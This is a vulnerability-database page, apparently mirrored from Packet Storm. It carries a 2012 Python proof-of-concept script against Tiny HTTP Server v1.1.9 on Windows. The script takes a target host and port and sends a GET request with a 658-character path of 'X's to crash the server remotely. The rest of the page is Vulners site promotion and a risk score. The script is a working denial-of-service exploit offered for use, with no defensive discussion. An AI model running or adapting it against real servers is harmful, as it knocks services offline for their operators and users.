Lucene search
+L

Tiny HTTP Server 1.1.9 Crash

🗓️ 25 Feb 2012 00:00:00Reported by localh0tType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Tiny HTTP Server v1.1.9 Remote Crash PoC - Window

Code
`#!/usr/bin/python  
# Tiny HTTP Server <=v1.1.9 Remote Crash PoC  
# written by localh0t  
# Date: 24/02/11  
# Contact: [email protected]  
# Follow: @mattdch  
# www.localh0t.com.ar  
# Targets: Windows (All)  
import httplib,sys  
if (len(sys.argv) < 3):  
print "\nTiny HTTP Server <=v1.1.9 Remote Crash PoC"  
print "\n Usage: %s <host> <port> \n" %(sys.argv[0])  
sys.exit()  
payload = "X" * 658  
try:  
print "\n[!] Connecting to %s ..." %(sys.argv[1])  
httpServ = httplib.HTTPConnection(sys.argv[1] , int(sys.argv[2]))  
httpServ.connect()  
print "[!] Sending payload..."  
httpServ.request('GET', "/" + str(payload))  
print "[!] Exploit succeed. Check %s if crashed.\n" %(sys.argv[1])  
except:  
print "[-] Connection error, exiting..."  
httpServ.close()  
sys.exit()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Feb 2012 00:00Current
7.4High risk
Vulners AI Score7.4
27